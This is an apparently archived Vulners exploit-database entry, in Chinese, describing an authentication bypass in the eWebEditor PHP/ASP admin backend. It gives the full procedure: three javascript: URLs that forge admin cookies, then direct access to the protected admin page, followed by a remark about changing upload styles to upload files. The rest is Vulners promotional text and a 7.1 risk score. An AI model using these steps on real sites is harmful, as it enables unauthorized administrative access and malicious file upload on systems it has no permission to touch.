Vulners
Lucene search
ewebeditor php&asp版本后台跳过认证漏洞
首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了.
这时候你清空浏览器的url,然后输入
javascript:alert(document.cookie="adminuser="+escape("admin"));
javascript:alert(document.cookie="adminpass="+escape("admin"));
javascript:alert(document.cookie="admindj="+escape("1"));
后三次回车,清空浏览器的 url,大家注意了,这次输入的url要注意,我们这次要输入的文件都是在正常情况下经过验证才能浏览的文件如../ewebeditor/admin /default.php
哈哈,直接进去了,利用和asp一样,新增样式修改上传,就ok了
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Jan 2010 00:00Current
7.1High risk
Vulners AI Score7.1